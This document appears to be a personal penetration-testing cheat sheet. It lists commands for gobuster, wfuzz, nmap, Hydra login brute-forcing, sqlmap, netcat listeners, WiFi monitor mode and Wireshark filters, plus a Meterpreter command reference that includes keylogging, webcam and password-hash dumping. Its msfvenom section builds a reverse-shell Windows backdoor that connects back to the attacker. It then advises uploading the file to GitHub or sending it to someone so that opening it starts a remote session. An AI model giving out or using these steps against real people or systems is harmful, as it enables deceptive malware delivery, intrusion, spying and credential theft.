Update everything:
sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y && sudo apt-get full-upgrade -y
===========================================================================================================================
#Gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.43 -o gobuster/http-dlist-lower-small.tx

#Wfuzz:
wfuzz -u http://10.10.10.167/admin.php -H FUZZ:FUZ2Z -w /home/kali/htb/control/headers -W /home/kali/htb/control/ip -p 127.0.0.1:8080:HTTP
===========================================================================================================================
Setting up Metasploit:
systemctl start postgresql
msfdb init
db_status
===========================================================================================================================
Listener:
nc -lvnp 9001
===========================================================================================================================
Python server for when you want to transfer a file
sudo python3 -m http.server 80
===========================================================================================================================
Nmap:
nmap -sC -sV -oA nmap/initial 10.10.10.84

    -sC specifies default scripts
    -sV probes each port for services
    -oA outputs to all major file types
    nmap/initial specifies the directory in which to output the scan
===========================================================================================================================	
Hydra:
hydra -l admin -P /home/kali/htb/nineveh/10k 10.10.10.43 http-post-form "/department/login.php:username=^user^&password=^PASS^:Invalid" -t 64
===========================================================================================================================
SQLmap:
sqlmap -r search.req --batch --force-ssl
sqlmap -r login.req --batch --force-ssl
	-'search.req = info from search bar results using BurpSuite Repeater using 'Copy to File'
	-'login.req = info from login screen using results from BurpSuite Repeater using 'Copy to File'
===========================================================================================================================	
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.141 -f exe -o payload.exe
===========================================================================================================================	
How to set a WiFi adapter in Monitor Mode:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

or

airmon-ng check kill
airmon-ng start wlan0
===========================================================================================================================
How to install dpkg:
dpkg -i ~/Downloads/file.deb
===========================================================================================================================
Starting a handler with Metasploit:
You can start a handler with Metasploit at any time, this is useful when you are executing a backdoor
in a victim’s machine and you need to connect back to take control. Now we’ll show you the steps you 
need to start your handler at the same port of your backdoor. 

#msfconsole
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <Listening_IP> (Your IP)
msf exploit(handler) > set LPORT <Listening_Port> (for example set LPORT 4444)
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[*] Starting the payload handler…
===========================================================================================================================
Creating an executable backdoor with Metasploit:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.239 -f exe -o payload.exe

LHOST= Your IP
RHOST= Target IP

The backdoor.exe file is saved in the path where you executed the command.

Upload this file to GitHub or send it to someone, once they open it, your meterpreter session will start
===========================================================================================================================

Meterpreter Commands:

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: User interface Commands

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user's desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components
	
	Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

	
	Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
	
	
Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system
	
	Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes




Wireshark Filters:


Filtering traffic from one server:

ip.addr eq <IP>

Filtering traffic between two servers:

ip.addr eq <IP1> and ip.addr eq <IP2>

Filtering traffic of standard protocols:

smtp

ldap

ssl

http

dns

Filtering an SMTP conversation between two servers:

ip.addr eq <IP1> and ip.addr eq <IP2> and smtp

Filtering an HTTP conversation between two servers:

ip.addr eq <IP1> and ip.addr eq <IP2> and http

Filtering an SMTP Conversation with TLS between two servers:

ip.addr eq <IP1> and ip.addr eq <IP2> and ssl

Filtering outgoing packets from ona particular IP:

ip.src eq <IP>

Filtering incoming packets from one particular IP:

ip.dst eq <IP>

Filtering the number of SMTP sessions:

smtp.req.command eq QUIT

Filtering the number of transmited mails:

smtp.req.command eq MAIL

Filtering the number of recipients in an SMTP conversation:

smtp.req.command eq RCPT

Filtering a specific recipient mailbox:

smtp.req.command eq RCPT and smtp.req.parameter contains “user@domain.com”

Filtering a specific sender mailbox:

smtp.req.command eq MAIL and smtp.req.parameter conatains “user@domain.com”

Filtering SMTP errors:

If you know the error code then use this filter:

smtp.response.code eq <ERROR_CODE>

for example: smtp.response.code eq 421

If you don’t know it, or if you want to list all SMTP errors in the SMTP sessions, then you must first exclude all the valid codes (2XX) until you end up only with 4XX or 5XX codes.

not smtp.response.code eq 220 and not smtp.response.code eq 221 and not smtp.response.code eq 250 and not smtp.response.code eq 354 and smtp.response.code

When you execute this filter you will end up only with 4XX and/or 5XX error codes so you will see all SMTP errors withing your capture. If it ends up blank, it means that no SMTP errors were found in that specific capture.

===========================================================================================================================
